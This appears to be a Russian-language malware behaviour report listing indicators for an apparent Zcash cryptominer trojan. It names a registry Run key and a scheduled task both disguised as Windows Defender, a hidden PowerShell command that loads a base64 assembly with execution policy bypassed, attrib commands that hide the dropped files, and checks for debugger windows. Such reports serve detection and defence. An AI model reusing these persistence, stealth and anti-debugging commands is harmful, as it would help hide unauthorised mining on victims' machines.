Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WindowsDefenderTasksupport' = '%APPDATA%\sgm\son.bat'
- ClassName: 'OLLYDBG', WindowName: ''
- ClassName: 'OLLYDBG', WindowName: 'OllyDBg'
- %APPDATA%\sgm\sgvhosts.exe
- %APPDATA%\sgm\son.bat
- %APPDATA%\sgm\nircmd.exe
- %APPDATA%\sgm\sgminerzcash.conf
- %APPDATA%\sgm\equihash-param.h
- %APPDATA%\sgm\equihash.cl
- %TEMP%\tmp1.tmp.bat
- %TEMP%\tmp1.tmp.bat
- ClassName: 'ObsidianGUI', WindowName: ''
- ClassName: 'WinDbgFrameClass', WindowName: ''
- ClassName: 'ID', WindowName: ''
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 2 /tn "WindowsDefenderTasksgm" /tr "powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [Reflection.Assembly]::Load([System.Convert]::Frombase64Strin...
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp1.tmp.bat" "
- '<SYSTEM32>\attrib.exe' +s +a +h %APPDATA%\sgm
- '<SYSTEM32>\attrib.exe' +s +a +h %APPDATA%\sgm\*